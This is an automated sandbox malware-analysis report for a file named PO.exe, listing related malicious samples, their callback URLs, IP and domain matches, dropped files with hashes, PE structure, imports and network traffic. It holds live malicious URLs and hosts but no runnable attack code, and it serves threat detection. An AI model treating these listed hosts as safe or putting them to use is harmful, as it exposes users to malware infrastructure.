                                      • www.yogatrac.com/nyd/?YtuHyXfh=SMnWtEQ8y2pX2v0EcX/kTDaCTyMd/4ZOM8Yn20hDsleGVYNoHo8paRPAMQl4LEXOAbPhqadgrw==&EZXXgv=jfFxzRS8f
                                      DHL Shipping Documents.exeGet hashmaliciousBrowse
                                      • www.moxie.tools/iuem/?FPWh=qnqwh/4dGUkEPIiKKZC2Qh7/64Y57CPLqiaIJV/+rJe3odMWgDf37HnBEyhQfLRblvKe&a48=tXIxBt1HyrBHz
                                      Qag2QPPlqt.dllGet hashmaliciousBrowse
                                      • deregojikulo.uno/
                                      proposal.xlsmGet hashmaliciousBrowse
                                      • www.presetleb.com/c2m8/?Cp=mL3ph6&9rH8-46=B8KyvHV7cHq72Oa5QjcCq/2rFyb4yB/qHh31zSj+jHa+8ZyD95jL+K6sl8yH++EKbvdp
                                      ezr37taArt.exeGet hashmaliciousBrowse
                                      • www.miraterratravel.com/ea9e/?GV_T=kpyYxkk9Ceh68GTku2FXTga5fFtWFfAJreHIHrkcWtIc/mW0Yt08earvdHXP/oWhsQVrL3JPMw==&AnB=O2Mx8TLHW
                                      Soa.docGet hashmaliciousBrowse
                                      • www.jel-tv365.com/bf3/?ObUhgbrX=pPFC1+5LH0IKJOgFl43N69YXWFusdtxU8P9UDIzNNR9l6bY12tLu7UJOSlu1hZVFy9DQOw==&bxl8=Z488bf3h1DuDA8F
                                      SCAN_20210112_132640143,pdf.exeGet hashmaliciousBrowse
                                      • www.pizzony.com/rmck/?Bf=7fOJYc3SWWcK9ItFVlvmlups7o9AcKVpiUJzUCYg5a838kgteGFS+Jc7xrCS57SKg0rr&rv0PXN=hBZtPr80A0f
                                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtfGet hashmaliciousBrowse
                                      • www.buyleasenames.com/th9/?MbCdXj=rmVgIP7NLqu5IqLfwUaZy5YpunnORz1e2lJnxDx+qK6UmpGhFXMhTGrvGFqOmXv+78GrdA==&1bL0=nN6tXVY0-tVP_b
                                      inv.exeGet hashmaliciousBrowse
                                      • www.pompanodogtrainers.com/tabo/?uFQh=t2k4hn5TmbxwPjUurJswVrDNAFkjO32ahLMl0tqguGOf6hevZwPAKcE0/42AiwGFl7gy&CTvX=cvUhPfRP
                                      h3dFAROdF3.exeGet hashmaliciousBrowse
                                      • www.dog2meeting.com/jskg/?8pgD2lkp=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxtnR1X6Bv9&yTIDml=X6XHfZU8d
                                      d2mISAbTQN.exeGet hashmaliciousBrowse
                                      • www.dog2meeting.com/jskg/?Hr=V48HzvXX&v4=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49Odu7h5v3gSr//fqzw==
                                      n41pVXkYCe.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?8pJPDtoX=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctryp5FdPNoXwMPrDtw==&CvL0=inCTmHzH
                                      kqwqyoFz1C.exeGet hashmaliciousBrowse
                                      • www.dog2meeting.com/jskg/?9roHn=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxtnR1X6Bv9&npHhW=3fq4gDD0abs8
                                      BsR85tOyjL.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?V4=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctoeA6Fh3ELim&Uzu8J=Szrd3PcPWlV
                                      Z4bamJ91oo.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?inKP_TF0=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctr+Q1kxPauLh&oneha=xPMpsZU8
                                      zISJXAAewo.exeGet hashmaliciousBrowse
                                      • www.dog2meeting.com/jskg/?1bwHc=yVMpBJZhmT_xj43&Rl=Y/uFy6OHl+vX3IZ3Qfe5vfr48pRY/dEtqQvX+/tunP2PQCRCuPtWrt+49NxH4hFX+Dn9
                                      zISJXAAewo.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?X2JtLRIH=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctoeql1R3AJqm&blv=UVIpcz0pIRTp
                                      uqAU5Vneod.exeGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?afcTJPQ8=B6OS4EeNWj1Nsi9Rl2yENkMcFrDOqbu3f1ZnErtBASFbgqP0FYCeVfLctryp5FdPNoXwMPrDtw==&cxoT9=yhvp2Xfp
                                      P0_4859930058_NEW_0RDER.xlsxGet hashmaliciousBrowse
                                      • www.bootyfashions.com/jskg/?oBN0yB=B6OS4EeIWk1Jsyxdn2yENkMcFrDOqbu3f1B3YoxAEyFagbjyCITSDbzeuNyW+VlEPI/WVw==&2dhH=XHE0vBK
                                      KWOgblwL7W.exeGet hashmaliciousBrowse
                                      • www.keebcat.com/d9s8/?J48Lz0S0=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd&ArR=YVcTxLcP

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      pixie.porkbun.comPO4308.exeGet hashmaliciousBrowse
                                      • 44.227.76.166
                                      pumYguna1i.exeGet hashmaliciousBrowse
                                      • 44.227.76.166
                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                      • 44.227.76.166
                                      comprobante de pago bancario.exeGet hashmaliciousBrowse
                                      • 44.227.76.166
                                      DHL Shipping Documents.exeGet hashmaliciousBrowse
                                      • 44.227.76.166
                                      PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      Proforma Invoice 2.xlsxGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      Transfer Form.exeGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      7Q5Er1TObp.exeGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      foHzqhWjvn.exeGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      27hKPHrVa3.exeGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      NEW ORDER QUOTATION.xlsxGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      NEW ORDER.xlsxGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      Invoice #0023228 PDF.exeGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      SWIFT.exeGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      proposal.xlsmGet hashmaliciousBrowse
                                      • 44.227.76.166
                                      ezr37taArt.exeGet hashmaliciousBrowse
                                      • 44.227.76.166
                                      Soa.docGet hashmaliciousBrowse
                                      • 44.227.76.166
                                      RFQ TK011821.docGet hashmaliciousBrowse
                                      • 44.227.65.245
                                      SCAN_20210112_132640143,pdf.exeGet hashmaliciousBrowse
                                      • 44.227.76.166

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      UDMEDIA-ASDEsample.exeGet hashmaliciousBrowse
                                      • 194.117.254.45
                                      qZpkW36P5i.exeGet hashmaliciousBrowse
                                      • 194.117.254.45
                                      Emotet.docGet hashmaliciousBrowse
                                      • 194.117.254.33
                                      AMAZON-02USinvoice.exeGet hashmaliciousBrowse
                                      • 35.156.117.131
                                      Calt7BoW2a.exeGet hashmaliciousBrowse
                                      • 3.14.206.30
                                      0BAdCQQVtP.exeGet hashmaliciousBrowse
                                      • 52.40.12.112
                                      TazxfJHRhq.exeGet hashmaliciousBrowse
                                      • 52.216.152.43
                                      1wOdXavtlE.exeGet hashmaliciousBrowse
                                      • 52.216.179.59
                                      hvEop8Y70Y.exeGet hashmaliciousBrowse
                                      • 15.165.26.252
                                      8sxgohtHjM.exeGet hashmaliciousBrowse
                                      • 3.13.255.157
                                      eQLPRPErea.exeGet hashmaliciousBrowse
                                      • 13.248.216.40
                                      vbc.exeGet hashmaliciousBrowse
                                      • 3.13.255.157
                                      o2KKHvtb3c.exeGet hashmaliciousBrowse
                                      • 18.218.104.192
                                      Order Inquiry.exeGet hashmaliciousBrowse
                                      • 3.14.206.30
                                      6IGbftBsBg.exeGet hashmaliciousBrowse
                                      • 104.192.141.1
                                      nicoleta.fagaras-DHL_TRACKING_1394942.htmlGet hashmaliciousBrowse
                                      • 52.218.213.96
                                      PaymentAdvice.exeGet hashmaliciousBrowse
                                      • 3.14.206.30
                                      ikoAImKWvI.exeGet hashmaliciousBrowse
                                      • 104.192.141.1
                                      BL01345678053567.exeGet hashmaliciousBrowse
                                      • 3.14.206.30
                                      AL JUNEIDI LIST.xlsxGet hashmaliciousBrowse
                                      • 65.0.168.152
                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                      • 65.0.168.152
                                      Statement of Account.xlsxGet hashmaliciousBrowse
                                      • 15.165.26.252
                                      Shipping Documents.xlsxGet hashmaliciousBrowse
                                      • 52.217.8.51

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\0c1xisnj7gzhsxz
                                      Process:C:\Users\user\Desktop\PO.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):186368
                                      Entropy (8bit):7.9990308732293505
                                      Encrypted:true
                                      SSDEEP:3072:dxXjk0A3knDWFylq12Hk4MSxUt0SaGFUw8JIkV+6H3PoH/BIbrAIVxI:dNjU3kn46q2k43OFU2kV++wmb9VW
                                      MD5:020124B82D8A5F3837DAE65C84839A13
                                      SHA1:E11D3587563B303BAE663D8B4F634D70E6FFF54A
                                      SHA-256:49CA2A8DDC46ED5FDD3C8DFF58683CACD0C8445A6675E01E0E422BB5B8729659
                                      SHA-512:864086161DD9A53B20A89933E4F73A082E829D5B944C784A4EB3BFC6CBF1E47E69AF2E8C0DC31BA28F479FB3AE54103BA013F821B05B0A6759BD3B100FC77873
                                      Malicious:false
                                      Reputation:low
                                      Preview: KUxm~...m......Z.$.Xd..@..N.....[y.=Hy*.....o...R.....X..z..:. .&.i...3q....,....JZ..gx...}.QQ........x..d.;'.....(~.. *.%.....<...#.%&....r....._U.8k.Uz..tZ...|r.../...{......v....-a].|...7.F.U..h.2...v.....H.uvM.d.p.1.Lc......:.....W.@..1gdTUs.C......{%...jrV.K1._..*.O.z...cM.R:.a.xj..RZ.d.[f_~m.*.hg[..F._..3~z...BA.S....y.ha,_rJ..8.c...?.EF..R.+...$b.....V.).'.{...L}....#...Q..........W..5.Xjxt..&.h.U..._...K]p)l..<P..f..9..oV`......... ./&.]|..L$.ck..PP.....3q../.W^...?......&.k$...R.b.....1Gd..A5.....@v...B.3..|<p.}.rB%...A*n..-.;..?v.bsH..b...F.t.T..(9-k.%+v...G.....+[R.......9.0.ud..0.Ib.o....o......9..W.....Ma.i..$x9..)).......l8..`./.<Ak....B*..L#.....Am......T.....I.Z..Y~y...Z.V..r......@.....$..L.1...hH&.G......\....?.4.p&.H..............wB.1..@..v..;.c.C<.$.j!'....k8CSD..J...2H=e..l6R..Z^..j...b....s...<.!j.O8......b`.L#:.H.....!.@.^.~.Z.@......r...}....P0M....]j...@..k..P.3...s.......N..k.W.[.......;.s8,.H.a....(.#Ln.r.x..tM6......
                                      C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll
                                      Process:C:\Users\user\Desktop\PO.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):4.1361599484937495
                                      Encrypted:false
                                      SSDEEP:48:vpgNQILdkQpZXsXvPviTLNuLebdsbriB4ZYmR:Bc+8pmvPvinktfiuZVR
                                      MD5:7DA758941832369963F45B31B4BE74EB
                                      SHA1:775719B94BF9E81CD4E2A99DC3ECB2DF61020129
                                      SHA-256:D68BF256D203EB2B6630F8D9D5FF63AE674ADB94D0BE58BDD2CE9E6C9269CA30
                                      SHA-512:45EE9A16381067CC06D1954E41A17DE62E64B3AAF4A6E9307D8A9EBAAD4CB644D3F2C903EB0A61B75FB65E01D6B128525BAA9856BAFE766D5CE1A4B330FF0BF2
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 10%
                                      Reputation:low
                                      Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L... ..............................................$"...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\yfmgdsfcotdgfk
                                      Process:C:\Users\user\Desktop\PO.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6661
                                      Entropy (8bit):7.9543287169682415
                                      Encrypted:false
                                      SSDEEP:192:A4CaC0frJWuNQpQc4H9aEmBkcXntsB5DaCW:APazDJspX4GmikW
                                      MD5:25891C3E29F2C303C026F8716C29F1BE
                                      SHA1:D1A289B1CB960EB9987DB9488D76D9C5553CCBBB
                                      SHA-256:A6DFD0BD1725F7B948ED304A77F403345C750E9A41E1F8526CD509D192E6FD76
                                      SHA-512:339FD62334C78DC483F370AE5521CFA1BA757647D67D02BCE80CAD8914E84B3CDC9E798A72BE2DA24D4157AD2ADD7D5F5481D850B0E123C644F5711232F233D9
                                      Malicious:false
                                      Reputation:low
                                      Preview: .....#....O.... z.(>...q|...k.......y*.fb...:...v9..().yZ....>Z.P..k..3.5=U....2.z..gK...n=.......H.q.........~.,ny..o.....4t.-5..JA..2K.c.8...S.9Z.}u....[....,....z&..k ...8..4.i.{B...GX...0+|U=.eA.C..:...e.$?V_.!.9.....a..pX..@...aB9d....O..!{o....[K.}.....%.Z1.0.....F.....c..I.R..:|(M....U.*4.z.2..........c..0[.M.....J..[z..v.{.q..../#G6.4P..d.5.q.>@.....t/P.n.7.e.0.....l..x...u...*.r.#.,.|G.u.y..4&.4P%.'HJ2c....Y....P.^.O.x.@N..a.e....:..<..mE..f...B..6.!.9.+K......a....^..J.&d.m<...7.Xp.X...)..(...BzZ....mI.......b...........-.X)....4j.E....W7........tC... ......0.fi...j..f].N....LZ.v..0........FL.d.&.t.Y...?..Xtg...T.l.!OE.~.A|y..2O.wX.....z ji*Bq..%82...z>d}<\.`<e..G.g..-.JC..:..;".B[;y....S2y..v.....7..R..J....E......v..wg..4,.X......u...b./.G.....t{.e...>q=?.....~Z_..........'../.O......XM...4.{...0.)........nB.!._.)..Z@.....B...G1o6l.a...t.ON...u.F.M....d-..Z.E......7...r..Hj2z&?......,J...P..kmr%...e..}..U`.....mNY.._.&9..y..Ih.A.l8.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.917905190852182
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:PO.exe
                                      File size:228037
                                      MD5:665cb19601850467af3ee7d9fd0e0350
                                      SHA1:8ac40ef9fa5100a39b14258d8d8e562cefd7202c
                                      SHA256:f3147300f9248e07ffd3a1b7131bed4febad8b0a88eeda27e606f36d04ff1340
                                      SHA512:106e612d3a8aa36034cb534c87930b4013fcad08d338e7224b0245b305f963a28975e2f36f84a9b48f2d517e6c98285c24146adb9c2ebac9088fc3f379a0ef7b
                                      SSDEEP:3072:HyewmN4skJ6/rfxXjk0A3knDWFylq12Hk4MSxUt0SaGFUw8JIkV+6H3PoH/BIbrN:Hd7bNjU3kn46q2k43OFU2kV++wmb9V5
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                      File Icon

                                      Icon Hash:b2a88c96b2ca6a72

                                      Static PE Info

                                      General

                                      Entrypoint:0x40314a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:
                                      Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 0000017Ch
                                      push ebx
                                      push ebp
                                      push esi
                                      xor esi, esi
                                      push edi
                                      mov dword ptr [esp+18h], esi
                                      mov ebp, 00409240h
                                      mov byte ptr [esp+10h], 00000020h
                                      call dword ptr [00407030h]
                                      push esi
                                      call dword ptr [00407270h]
                                      mov dword ptr [007A3030h], eax
                                      push esi
                                      lea eax, dword ptr [esp+30h]
                                      push 00000160h
                                      push eax
                                      push esi
                                      push 0079E540h
                                      call dword ptr [00407158h]
                                      push 00409230h
                                      push 007A2780h
                                      call 00007F2258D7E2A8h
                                      mov ebx, 007AA400h
                                      push ebx
                                      push 00000400h
                                      call dword ptr [004070B4h]
                                      call 00007F2258D7B9E9h
                                      test eax, eax
                                      jne 00007F2258D7BAA6h
                                      push 000003FBh
                                      push ebx
                                      call dword ptr [004070B0h]
                                      push 00409228h
                                      push ebx
                                      call 00007F2258D7E293h
                                      call 00007F2258D7B9C9h
                                      test eax, eax
                                      je 00007F2258D7BBC2h
                                      mov edi, 007A9000h
                                      push edi
                                      call dword ptr [00407140h]
                                      call dword ptr [004070ACh]
                                      push eax
                                      push edi
                                      call 00007F2258D7E251h
                                      push 00000000h
                                      call dword ptr [00407108h]
                                      cmp byte ptr [007A9000h], 00000022h
                                      mov dword ptr [007A2F80h], eax
                                      mov eax, edi
                                      jne 00007F2258D7BA8Ch
                                      mov byte ptr [esp+10h], 00000022h
                                      mov eax, 00000001h

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                      RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                      RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                      RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                      RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                      RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                      Imports

                                      DLLImport
                                      KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                      USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                      SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 8, 2021 12:10:12.314201117 CEST4969380192.168.2.5194.117.254.63
                                      Apr 8, 2021 12:10:12.331975937 CEST8049693194.117.254.63192.168.2.5
                                      Apr 8, 2021 12:10:12.333208084 CEST4969380192.168.2.5194.117.254.63
                                      Apr 8, 2021 12:10:12.333529949 CEST4969380192.168.2.5194.117.254.63
                                      Apr 8, 2021 12:10:12.350931883 CEST8049693194.117.254.63192.168.2.5
                                      Apr 8, 2021 12:10:12.351783037 CEST8049693194.117.254.63192.168.2.5
                                      Apr 8, 2021 12:10:12.351804018 CEST8049693194.117.254.63192.168.2.5
                                      Apr 8, 2021 12:10:12.353475094 CEST4969380192.168.2.5194.117.254.63
                                      Apr 8, 2021 12:10:12.353513956 CEST4969380192.168.2.5194.117.254.63
                                      Apr 8, 2021 12:10:12.371041059 CEST8049693194.117.254.63192.168.2.5
                                      Apr 8, 2021 12:10:32.768593073 CEST4969480192.168.2.544.227.76.166
                                      Apr 8, 2021 12:10:32.934870958 CEST804969444.227.76.166192.168.2.5
                                      Apr 8, 2021 12:10:32.934983015 CEST4969480192.168.2.544.227.76.166
                                      Apr 8, 2021 12:10:33.100056887 CEST804969444.227.76.166192.168.2.5
                                      Apr 8, 2021 12:10:33.100172997 CEST4969480192.168.2.544.227.76.166
                                      Apr 8, 2021 12:10:33.265103102 CEST804969444.227.76.166192.168.2.5
                                      Apr 8, 2021 12:10:33.269149065 CEST804969444.227.76.166192.168.2.5
                                      Apr 8, 2021 12:10:33.269192934 CEST804969444.227.76.166192.168.2.5
                                      Apr 8, 2021 12:10:33.269349098 CEST4969480192.168.2.544.227.76.166
                                      Apr 8, 2021 12:10:33.269407034 CEST4969480192.168.2.544.227.76.166
                                      Apr 8, 2021 12:10:33.437623024 CEST804969444.227.76.166192.168.2.5

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 8, 2021 12:08:21.699332952 CEST5679853192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:21.733257055 CEST53567988.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:21.852818966 CEST5248053192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:21.865542889 CEST53524808.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:30.327725887 CEST5116553192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:30.339555979 CEST53511658.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:31.201592922 CEST5318353192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:31.214391947 CEST53531838.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:32.134387016 CEST5758753192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:32.148320913 CEST53575878.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:38.045337915 CEST5543253192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:38.057888985 CEST53554328.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:40.378134012 CEST6493653192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:40.390716076 CEST53649368.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:46.192307949 CEST5270453192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:46.209988117 CEST53527048.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:51.159001112 CEST5221253192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:51.175426006 CEST53522128.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:53.754745007 CEST5430253192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:53.766885996 CEST53543028.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:55.126512051 CEST5378453192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:55.139259100 CEST53537848.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:56.251838923 CEST6530753192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:56.264457941 CEST53653078.8.8.8192.168.2.5
                                      Apr 8, 2021 12:08:57.022464037 CEST6434453192.168.2.58.8.8.8
                                      Apr 8, 2021 12:08:57.035022974 CEST53643448.8.8.8192.168.2.5
                                      Apr 8, 2021 12:09:01.906601906 CEST6206053192.168.2.58.8.8.8
                                      Apr 8, 2021 12:09:01.919754982 CEST53620608.8.8.8192.168.2.5
                                      Apr 8, 2021 12:09:51.705511093 CEST6180553192.168.2.58.8.8.8
                                      Apr 8, 2021 12:09:52.035056114 CEST53618058.8.8.8192.168.2.5
                                      Apr 8, 2021 12:10:12.245260954 CEST5479553192.168.2.58.8.8.8
                                      Apr 8, 2021 12:10:12.307060003 CEST53547958.8.8.8192.168.2.5
                                      Apr 8, 2021 12:10:32.642216921 CEST4955753192.168.2.58.8.8.8
                                      Apr 8, 2021 12:10:32.767242908 CEST53495578.8.8.8192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Apr 8, 2021 12:09:51.705511093 CEST192.168.2.58.8.8.80x5d97Standard query (0)www.cwyxonlp.icuA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:10:12.245260954 CEST192.168.2.58.8.8.80x1Standard query (0)www.websiteworlda-z.comA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:10:32.642216921 CEST192.168.2.58.8.8.80xb793Standard query (0)www.phorice.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
